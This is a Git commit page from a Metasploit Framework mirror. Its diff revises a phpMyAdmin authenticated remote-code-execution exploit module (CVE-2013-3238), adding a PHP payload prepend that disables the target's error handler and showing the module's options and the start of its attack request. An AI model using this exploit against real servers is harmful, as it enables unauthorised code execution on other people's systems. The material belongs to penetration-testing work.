infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clear out PMA's error handler 

* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
unstable
James Lee 2013-04-26 15:12:58 -05:00
parent 5900a7c03f
commit a0c1b6d1ce
1 changed files with 14 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/exploits/multi/http/phpmyadmin_preg_replace.rb
View File

@ -14,32 +14,35 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
'Description' => %q{ 'Description' => %q{
This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's
replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php
}, },
'Author' => 'Author' =>
[ [
'Janek "waraxe" Vind', # Discovery 'Janek "waraxe" Vind', # Discovery
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2013-3238' ], [ 'CVE', '2013-3238' ],
[ 'PMASA', '2013-2'], [ 'PMASA', '2013-2'],
[ 'waraxe', '2013-SA#103' ], [ 'waraxe', '2013-SA#103' ],
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ], [ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => ['php'], 'Platform' => ['php'],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Payload' => 'Payload' =>
{ {
'BadChars' => "&\n=+%", 'BadChars' => "&\n=+%",
# Clear out PMA's error handler so it doesn't lose its mind
# and cause ENOMEM errors and segfaults in the destructor.
'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Automatic', { } ],
], ],
@ -48,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
], self.class) ], self.class)
@ -137,7 +140,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))
exploit_result = send_request_cgi({ exploit_result = send_request_cgi({
'uri' => uri('db_structure.php'), 'uri' => uri('db_structure.php'),
'method' => 'POST', 'method' => 'POST',